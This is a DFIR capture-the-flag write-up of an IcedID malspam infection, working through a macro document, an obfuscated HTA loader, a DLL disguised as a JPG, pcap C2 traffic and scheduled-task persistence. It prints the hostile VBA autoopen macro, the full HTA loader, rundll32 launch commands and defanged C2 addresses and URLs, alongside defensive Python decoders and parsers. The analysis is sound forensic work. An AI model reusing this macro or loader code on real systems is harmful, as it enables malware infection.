4ensiX



LetsDefend Challenge DFIR: IcedID Malware Family writeup

LetsDefend Challenge DFIR: IcedID Malware Family

What is the sha256 hash for the malspam attachment?

There seems to be some premise that is not written in the description, so I am not sure, but is the doc the email attachment?

$ sha256sum 'docs 06.02.2021.doc'
cc721111b5924cfeb91440ecaccc60ecc30d10fffbdab262f7c0a17027f527d1  docs 06.02.2021.doc

Answer: cc721111b5924cfeb91440ecaccc60ecc30d10fffbdab262f7c0a17027f527d1

What is the child process command line when the user enabled the Macro?

The doc file from above:

$ file docs\ 06.02.2021.doc 
docs 06.02.2021.doc: Microsoft Word 2007+

It is Microsoft Word 2007+, so the macro can be viewed with oletools.

$ olevba -c docs\ 06.02.2021.doc 
olevba 0.60.1 on Python 2.7.17 - http://decalage.info/python/oletools
===============================================================================
FILE: docs 06.02.2021.doc
Type: OpenXML
WARNING  For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO leftSize.bas 
in file: word/vbaProject.bin - OLE stream: u'VBA/leftSize'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub autoopen()
initVba
Shell "explorer collectionBoxConst.hta", vbNormalFocus
End Sub
-------------------------------------------------------------------------------
VBA MACRO arrayBBorder.bas 
in file: word/vbaProject.bin - OLE stream: u'VBA/arrayBBorder'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub initVba()
Open "collectionBoxConst.hta" & buttTemplateHeader For Output As #1
Print #1, ActiveDocument.Range.Text
Close #1
End Sub

We were told to append .exe, so:
Answer: explorer.exe collectionBoxConst.hta

What is the HTML Application file's sha256 hash from previous question?

前の質問で実行されていたファイルのこと

$ sha256sum collectionBoxConst.hta 
b25865183c5cd2c5e550aca8476e592b62ed3e37e6b628f955bbed454fdbb100  collectionBoxConst.hta

Answer: b25865183c5cd2c5e550aca8476e592b62ed3e37e6b628f955bbed454fdbb100

Based on the previous question, what is the DLL run method?

collectionBoxConst.hta is very hard to read as-is.
Running it through a beautifier makes it readable.

<html>
  <body>
    <div id='copyCurrencyMemory'>fX17K(省略)mVmZVJ0c3VydCByYXY=aGVsbG8msscriptcontrol.scriptcontrol</div>
    <div id='vConstBorder'>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/</div>
    <script language='javascript'>
      function WLongPtr(altListVba) {
        return (new ActiveXObject(altListVba));
      }

      function objButtBool(headerListbox) {
        return (removeConstFunction.getElementById(headerListbox).innerHTML);
      }

      function boolOptionClass() {
        return (objButtBool('vConstBorder'));
      }

      function sinBooleanCur(s) {
        var e = {};
        var i;
        var b = 0;
        var c;
        var x;
        var l = 0;
        var a;
        var memSetByte = '';
        var w = String.fromCharCode;
        var L = s.length;
        var intBorder = zeroI('tArahc');
        for (i = 0; i < 64; i++) {
          e[boolOptionClass()[intBorder](i)] = i;
        }
        for (x = 0; x < L; x++) {
          c = e[s[intBorder](x)];
          b = (b << 6) + c;
          l += 6;
          while (l >= 8) {
            ((a = (b >>> (l -= 8)) & 0xff) || (x < (L - 2))) && (memSetByte += w(a));
          }
        }
        return (memSetByte);
      };

      function zeroI(genTempTextbox) {
        return genTempTextbox.split('').reverse().join('');
      }
      procDocumentI = window;
      removeConstFunction = document;
      procDocumentI.resizeTo(1, 1);
      procDocumentI.moveTo(-100, -100);
      var genericBoolean = removeConstFunction.getElementById('copyCurrencyMemory').innerHTML.split("aGVsbG8");
      var collectRightSingle = zeroI(sinBooleanCur(genericBoolean[0]));
      var vData = zeroI(sinBooleanCur(genericBoolean[1]));
      var viewPointerConvert = genericBoolean[2];
    </script>
    <script language='vbscript'>
      Function classResponseLocal(copyCurrencyMemory): Set snglSngTpl = CreateObject(viewPointerConvert): With snglSngTpl: .language = "jscript": .timeout = 60000: .eval(copyCurrencyMemory): End With: End Function
    </script>
    <script language='vbscript'>
      Call classResponseLocal(collectRightSingle)
    </script>
    <script language='vbscript'>
      Call classResponseLocal(vData)
    </script>
    <script language='javascript'>
      procDocumentI['close']();
    </script>
  </body>
</html>

There are two places where something obfuscated with base64 or similar is executed via VBScript:

Call classResponseLocal(collectRightSingle)
Call classResponseLocal(vData)

Extract and display the part involved in execution: change only the tail end and run it again in codebeautify.

(only the modified area is shown)
      var viewPointerConvert = genericBoolean[2];
      document.write("<br><br>");document.write(collectRightSingle);document.write("<br><br>");document.write(vData);
    </script>
  </body>
</html>
(everything after this was deleted)

The scripts obtained this way are below.
What document.write(collectRightSingle); displayed:

collectRightSingle

What document.write(vData); displayed:
vData

The line breaks and indentation were added by feel, so they may look odd.
Two scripts are visible. The question here is "what is the DLL run method?", and the DLL is wanted with its full path, so:
Answer: "C:\Windows\System32\rundll32.exe" c:\users\public\collectionBoxConst.jpg,PluginInit
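The HTA's decoder can also be reproduced without running it. The block below is an added example in Python, not code from the writeup or from the sample: it ports sinBooleanCur and zeroI, reads the blob and the alphabet from the two div elements, splits on the "aGVsbG8" marker exactly as the HTA does, and returns the two decoded stages plus the ProgID in the third field. The sample HTA, the rotated alphabet and the stage text are constructed for this example and carry harmless text rather than the real payload; the real file uses the standard alphabet, which the same lookup handles.

```python
"""Recover the HTA's two JScript stages statically (added example, not the writeup's code)."""
import base64
import re


def custom_b64_decode(s, alphabet):
    """Port of sinBooleanCur(): each symbol contributes 6 bits and a byte is emitted
    whenever 8 bits are buffered. A symbol outside the alphabet ('=' padding) turns
    the JScript accumulator into NaN, after which only zero bytes can come out and
    the (a || x < L-2) guard discards them, so stopping there is equivalent."""
    table = {ch: i for i, ch in enumerate(alphabet)}
    out = []
    buf = bits = 0
    n = len(s)
    for x, ch in enumerate(s):
        c = table.get(ch)
        if c is None:
            break
        buf = (buf << 6) | c
        bits += 6
        while bits >= 8:
            bits -= 8
            a = (buf >> bits) & 0xFF
            buf &= (1 << bits) - 1          # keep only the unconsumed bits
            if a or x < n - 2:              # same guard as the JScript
                out.append(chr(a))
    return "".join(out)


def recover_stages(hta_text):
    """Mirror the HTA's own steps: blob from 'copyCurrencyMemory', alphabet from
    'vConstBorder', split on the literal marker, decode, then reverse (zeroI)."""
    blob = re.search(r"<div id='copyCurrencyMemory'>(.*?)</div>", hta_text, re.S).group(1)
    alphabet = re.search(r"<div id='vConstBorder'>(.*?)</div>", hta_text, re.S).group(1)
    parts = blob.split("aGVsbG8")
    stage1 = custom_b64_decode(parts[0], alphabet)[::-1]
    stage2 = custom_b64_decode(parts[1], alphabet)[::-1]
    progid = parts[2]                       # CreateObject() target used by the VBScript
    return stage1, stage2, progid


# --- constructed sample input (harmless stand-in for the real payload) ---------------
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
ROTATED_ALPHABET = STD_ALPHABET[13:] + STD_ALPHABET[:13]   # non-standard table, to show the lookup matters
STAGE1 = 'var stage = "one"; /* constructed */'
STAGE2 = 'var stage = "two"; /* constructed */'
PROGID = "msscriptcontrol.scriptcontrol"


def encode_stage(text, alphabet):
    """Inverse of the HTA's pipeline, used only to build the sample: reverse, base64, re-alphabet."""
    std = base64.b64encode(text[::-1].encode("latin-1")).decode("ascii")
    return std.translate(str.maketrans(STD_ALPHABET, alphabet))


SAMPLE_HTA = (
    "<html><body>"
    f"<div id='copyCurrencyMemory'>{encode_stage(STAGE1, ROTATED_ALPHABET)}aGVsbG8"
    f"{encode_stage(STAGE2, ROTATED_ALPHABET)}aGVsbG8{PROGID}</div>"
    f"<div id='vConstBorder'>{ROTATED_ALPHABET}</div>"
    "</body></html>"
)

if __name__ == "__main__":
    for label, value in zip(("stage 1", "stage 2", "ProgID"), recover_stages(SAMPLE_HTA)):
        print(f"{label}: {value}")
```

Against the real collectionBoxConst.hta, recover_stages returns the two JScript stages that the writeup obtained by letting codebeautify evaluate document.write, without the script ever reaching msscriptcontrol.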

What is the image file dll installer sha256 hash from previous question?

The file used in the deobfuscated command from the previous question.

$ sha256sum collectionBoxConst.jpg 
51658887e46c88ed6d5861861a55c989d256a7962fb848fe833096ed6b049441  collectionBoxConst.jpg
$ file collectionBoxConst.jpg 
collectionBoxConst.jpg: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

So this jpg file is a PE.
Answer: 51658887e46c88ed6d5861861a55c989d256a7962fb848fe833096ed6b049441

What are the IP address and its domain name hosted installer DLL?

The installer DLL is the PE file disguised as a jpg, so what we want is the IP of the domain collectionBoxConst.jpg was downloaded from. The domain name was visible when the command ran, so I thought I could just resolve it, but the IP appears to have changed since, so the IP at the time of execution has to be checked in the distributed pcap.

$ tshark -r infection-traffic.pcap -Y "http.request"
    6   0.377723   10.6.2.103 → 45.142.213.105 HTTP 616 GET /adda/T/5xBOnOkAQixWY7/JQNizzLtuT6BVV0xRecCKVVHAAR6PkgGrIPN/sose5?user=anRsIkfbv&time=0qobcg4DyUX11ZLF5yHrIevFn&page=1K2n8iJ&i9y9SwJu=yVaCtZ9s0gUfn&q=hj9xWh4I6PDdXOPDey&id=Vr4pf&user=mHMoD292T&search=uZVgg21LyVRFdD2FABGZvQlnkM90&q=Dwc1s67MbWC24TGoOjMXC HTTP/1.1 
  966   8.610776   10.6.2.103 → 172.67.169.59 HTTP 334 GET / HTTP/1.1

It seems the IP is 45[.]142.213.105. To confirm:

$ tshark -r infection-traffic.pcap -Y "http.request && ip.dst == 45.142.213.105" -V
(everything except the part I wanted to confirm is omitted)
    Arrival Time: Jun  2, 2021 16:49:58.629124000 EDT
(snip)
    Source: 10.6.2.103
    Destination: 45.142.213.105
Transmission Control Protocol, Src Port: 57592, Dst Port: 80, Seq: 1, Ack: 1, Len: 562
    Source Port: 57592
    Destination Port: 80
 (snip)
    Host: coursemcclurez.com\r\n
(snip)

Answer: 45[.]142.213.105, coursemcclurez[.]com
The [.] is defanging, so the actual answer is entered without it.

What is the full URL for the DLL installer?

The URL the PE file disguised as a jpg was downloaded from (http:// is written as http[:]//).
Answer: http[:]//coursemcclurez.com/adda/T/5xBOnOkAQixWY7/JQNizzLtuT6BVV0xRecCKVVHAAR6PkgGrIPN/sose5?user=anRsIkfbv&time=0qobcg4DyUX11ZLF5yHrIevFn&page=1K2n8iJ&i9y9SwJu=yVaCtZ9s0gUfn&q=hj9xWh4I6PDdXOPDey&id=Vr4pf&user=mHMoD292T&search=uZVgg21LyVRFdD2FABGZvQlnkM90&q=Dwc1s67MbWC24TGoOjMXC

What are the two IP addresses identified as C2 servers?

There were 8 IPs visible in the pcap.

$ tshark -r infection-traffic.pcap -z conv,ip -q
================================================================================
IPv4 Conversations
Filter:<No Filter>
                                               |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                               | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.6.2.103           <-> 194.5.249.46            1411   1987761     907     68828    2318   2056589    72.878155000        72.6158
10.6.2.103           <-> 172.67.169.59            548    778140     317     22306     865    800446     8.578007000        63.0912
10.6.2.103           <-> 38.135.122.194           418     41897     446    189140     864    231037   534.534514000       157.2711
10.6.2.103           <-> 45.142.213.105           402    573316     284     20504     686    593820     0.193640000         2.8731
10.6.2.103           <-> 65.8.218.70              183    252853      90      5755     273    258608     7.335177000        64.3388
10.6.2.103           <-> 185.33.85.35              70     13979      73     11177     143     25156    13.384999000       663.2378
10.6.2.1             <-> 10.6.2.103                 8       600       8       822      16      1422     0.000000000       675.7458
================================================================================

Six IPs communicate with 10[.]6.2.103, and 45[.]142.213.105 is known to have only served the download.
Not really sure which ones to pick, I ran them all through VirusTotal; 38[.]135.122.194, 194[.]5.249.46 and 185[.]33.85.35 were flagged, so combining these:
Answer: 185[.]33.85.35, 194[.]5.249.46
As usual, defanged with [.].
This ended up rather arbitrary, so I would like stronger grounds. They all look suspicious.

What are the four C2 domains identified in the PCAP file?

Since the question asks about domains, look at DNS:

$ tshark -r infection-traffic.pcap -Y "dns"
Running as user "root" and group "root". This could be dangerous.
    1   0.000000   10.6.2.103 → 10.6.2.1     DNS 78 Standard query 0xc544 A coursemcclurez.com
    2   0.177849     10.6.2.1 → 10.6.2.103   DNS 94 Standard query response 0xc544 A coursemcclurez.com A 45.142.213.105
  689   7.268986   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xc52c A aws.amazon.com
  690   7.317488     10.6.2.1 → 10.6.2.103   DNS 168 Standard query response 0xc52c A aws.amazon.com CNAME tp.8e49140c2-frontier.amazon.com CNAME dr49lng3n1n2s.cloudfront.net A 65.8.218.70
  961   8.509279   10.6.2.103 → 10.6.2.1     DNS 76 Standard query 0x2368 A supplementik.top
  962   8.575830     10.6.2.1 → 10.6.2.103   DNS 108 Standard query response 0x2368 A supplementik.top A 172.67.169.59 A 104.21.79.67
 1825  13.295954   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xaa92 A fimlubindu.top
 1826  13.382333     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xaa92 A fimlubindu.top A 185.33.85.35
 1848  72.785911   10.6.2.103 → 10.6.2.1     DNS 76 Standard query 0xa7f4 A extrimefigim.top
 1849  72.876395     10.6.2.1 → 10.6.2.103   DNS 92 Standard query response 0xa7f4 A extrimefigim.top A 194.5.249.46
 1898  77.243965   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xcb22 A kilodaser4.fit
 1899  77.308989     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xcb22 A kilodaser4.fit A 185.33.85.35
 1911  77.687111   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xe452 A arhannexa5.top
 1913  77.774932     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xe452 A arhannexa5.top A 185.33.85.35
 5149 675.694370   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xe5b5 A arhannexa5.top
 5150 675.745802     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xe5b5 A arhannexa5.top A 185.33.85.35

Since 185[.]33.85.35 and 194[.]5.249.46 are known to be the C2 servers, pick the domains that resolved to them:
Answer: arhannexa5[.]top, extrimefigim[.]top, fimlubindu[.]top, kilodaser4[.]fit
[.] as before.

After the DLL installer being executed, what are the two domains that were being contacted by the installer DLL?

Looking at the DNS queries immediately after the one for coursemcclurez[.]com:
Answer: aws[.]amazon[.]com, supplementik[.]top
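To make the pivot from the flagged C2 IPs to their domains reproducible, and to answer the "two domains contacted after the installer" question from the same data, here is an added Python example that is not part of the writeup: it parses tshark's one-line DNS summaries, builds the name-to-address map from the responses, lists the names whose answers include a given set of IPs, and lists the names queried right after a given lookup. The input lines are the tshark output shown above; the parser is my own and assumes tshark's default summary layout (frame, time, src → dst, protocol, length, info).

```python
"""Pivot from C2 IPs to the names that resolved to them (added example, not the writeup's code)."""
import re
from collections import defaultdict

# tshark -r infection-traffic.pcap -Y "dns" output from the writeup above
DNS_LINES = """\
    1   0.000000   10.6.2.103 → 10.6.2.1     DNS 78 Standard query 0xc544 A coursemcclurez.com
    2   0.177849     10.6.2.1 → 10.6.2.103   DNS 94 Standard query response 0xc544 A coursemcclurez.com A 45.142.213.105
  689   7.268986   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xc52c A aws.amazon.com
  690   7.317488     10.6.2.1 → 10.6.2.103   DNS 168 Standard query response 0xc52c A aws.amazon.com CNAME tp.8e49140c2-frontier.amazon.com CNAME dr49lng3n1n2s.cloudfront.net A 65.8.218.70
  961   8.509279   10.6.2.103 → 10.6.2.1     DNS 76 Standard query 0x2368 A supplementik.top
  962   8.575830     10.6.2.1 → 10.6.2.103   DNS 108 Standard query response 0x2368 A supplementik.top A 172.67.169.59 A 104.21.79.67
 1825  13.295954   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xaa92 A fimlubindu.top
 1826  13.382333     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xaa92 A fimlubindu.top A 185.33.85.35
 1848  72.785911   10.6.2.103 → 10.6.2.1     DNS 76 Standard query 0xa7f4 A extrimefigim.top
 1849  72.876395     10.6.2.1 → 10.6.2.103   DNS 92 Standard query response 0xa7f4 A extrimefigim.top A 194.5.249.46
 1898  77.243965   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xcb22 A kilodaser4.fit
 1899  77.308989     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xcb22 A kilodaser4.fit A 185.33.85.35
 1911  77.687111   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xe452 A arhannexa5.top
 1913  77.774932     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xe452 A arhannexa5.top A 185.33.85.35
 5149 675.694370   10.6.2.103 → 10.6.2.1     DNS 74 Standard query 0xe5b5 A arhannexa5.top
 5150 675.745802     10.6.2.1 → 10.6.2.103   DNS 90 Standard query response 0xe5b5 A arhannexa5.top A 185.33.85.35
"""

# One tshark summary line: frame, relative time, src → dst, "DNS", length, then the info column.
LINE_RE = re.compile(
    r"^\s*(?P<frame>\d+)\s+(?P<time>[\d.]+)\s+(?P<src>\S+) → (?P<dst>\S+)\s+DNS\s+\d+\s+"
    r"Standard query(?P<resp> response)? 0x[0-9a-f]+ A (?P<qname>\S+)(?P<rest>.*)$"
)
# Answer section records look like "A 1.2.3.4"; CNAME hops are skipped by the IP shape.
IP_RE = re.compile(r"\bA (\d{1,3}(?:\.\d{1,3}){3})")


def parse_tshark_dns(text):
    """Return ([(time, name), ...] for queries, {name: {ip, ...}} for responses)."""
    queries, answers = [], defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        if m["resp"]:
            answers[m["qname"]].update(IP_RE.findall(m["rest"]))
        else:
            queries.append((float(m["time"]), m["qname"]))
    return queries, answers


def domains_resolving_to(answers, ips):
    """Names whose A answers include any of the given IPs (the C2-IP to C2-domain pivot)."""
    wanted = set(ips)
    return sorted(name for name, addrs in answers.items() if addrs & wanted)


def lookups_after(queries, domain, count):
    """Distinct names queried after the first query for `domain`, in time order."""
    started, seen, out = False, set(), []
    for _, name in sorted(queries):
        if not started:
            started = name == domain
            continue
        if name not in seen:
            seen.add(name)
            out.append(name)
            if len(out) == count:
                break
    return out


if __name__ == "__main__":
    q, a = parse_tshark_dns(DNS_LINES)
    print("C2 domains:", domains_resolving_to(a, ["185.33.85.35", "194.5.249.46"]))
    print("after the download:", lookups_after(q, "coursemcclurez.com", 2))
```

The same two functions answer the follow-up question: lookups_after on coursemcclurez.com gives aws.amazon.com and supplementik.top, and domains_resolving_to with the two flagged IPs gives the four C2 domains, so the answers rest on the pcap rather than on reading the list by eye.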

The malware generated traffic to an IP address over port 8080 with two SYN requests, what is the IP address?

Filter and search exactly as the question specifies.

$ tshark -r infection-traffic.pcap -Y "tcp.flags.syn==1 && tcp.port == 8080"
 4275 534.534514   10.6.2.103 → 38.135.122.194 TCP 66 57609 → 8080 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
 4276 534.589017 38.135.122.194 → 10.6.2.103   TCP 66 8080 → 57609 [SYN, ACK] Seq=0 Ack=1 Win=55520 Len=0 MSS=1388 SACK_PERM=1 WS=256
 4292 571.503808   10.6.2.103 → 38.135.122.194 TCP 66 57614 → 8080 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
 4293 571.558688 38.135.122.194 → 10.6.2.103   TCP 66 8080 → 57614 [SYN, ACK] Seq=0 Ack=1 Win=55520 Len=0 MSS=1388 SACK_PERM=1 WS=25

Answer: 38[.]135.122.194
[.] as before.

The license.dat file was used to create persistence on the user's machine, what is the dll run method for the persistence?

Since it says persistence, I suppose this is where scheduled-task.txt comes in.

$ cat 2021-06-02-scheduled-task.txt
(snip)
      <Command>rundll32.exe</Command>
      <Arguments>"C:\Users\user1\AppData\Local\user1\Tetoomdu64.dll",update /i:"ComicFantasy\license.dat"</Arguments>
(snip)

Answer: C:\Users\user1\AppData\Local\user1\Tetoomdu64.dll",update /i:"ComicFantasy\license.dat
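An added Python example, not from the writeup, that parses a Task Scheduler XML export with the standard library, pulls out each Exec action, splits the rundll32 argument into DLL path and export, and flags DLLs loaded from user-writable directories. The XML wrapper (Task root, Actions element and the namespace URI of the Task Scheduler schema) is constructed; only the Command and Arguments values come from the scheduled task shown above.

```python
"""Extract the DLL run method from a scheduled-task export (added example, not the writeup's code)."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed wrapper around the Command/Arguments values from 2021-06-02-scheduled-task.txt.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>rundll32.exe</Command>
      <Arguments>"C:\Users\user1\AppData\Local\user1\Tetoomdu64.dll",update /i:"ComicFantasy\license.dat"</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# Directories a standard user can write to; a DLL persisted from here deserves a look.
USER_WRITABLE = re.compile(r"(?i)\\(AppData|Users\\Public|Temp|ProgramData)\\")


def exec_actions(task_xml):
    """All (command, arguments) pairs from the task's Exec actions."""
    root = ET.fromstring(task_xml)
    actions = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS)
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        actions.append((cmd.strip(), args.strip()))
    return actions


def dll_run_method(cmd, args):
    """For rundll32 actions return (dll_path, export) from the leading `"<dll>",<export>`."""
    if cmd.lower().rsplit("\\", 1)[-1] != "rundll32.exe":
        return None
    m = re.match(r'"?([^",]+)"?\s*,\s*(\w+)', args)
    return (m.group(1), m.group(2)) if m else None


def suspicious_persistence(task_xml):
    """rundll32 actions whose DLL lives in a user-writable path, with the full argument string."""
    findings = []
    for cmd, args in exec_actions(task_xml):
        parsed = dll_run_method(cmd, args)
        if parsed and USER_WRITABLE.search(parsed[0]):
            findings.append({"dll": parsed[0], "export": parsed[1], "arguments": args})
    return findings


if __name__ == "__main__":
    for f in suspicious_persistence(SAMPLE_TASK_XML):
        print(f"rundll32 {f['dll']},{f['export']}  (args: {f['arguments']})")
```

Run over a directory of exported tasks, the same check surfaces the rundll32-with-export pattern wherever the DLL sits under AppData, Users\Public, Temp or ProgramData, which is the shape of the persistence seen here.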

With OSINT, what is the malware family name used in this PCAP capture?

It is already in the challenge title, but the clearest way is to look up the initial doc on MalwareBazaar.
https://bazaar.abuse.ch/sample/cc721111b5924cfeb91440ecaccc60ecc30d10fffbdab262f7c0a17027f527d1/
Answer: IcedID

Based on Palo Alto Unit 42, what is the APT Group name?

Let's look it up.
TA551: Email Attack Campaign Switches from Valak to IcedID
Answer: TA551

What is the Mitre Attack code for the initial access in this campaign?

I stared for a while at the TA551 article above and at MITRE's Initial Access techniques, wondering which fits best. Since this started with an attachment:
Answer: T1566.001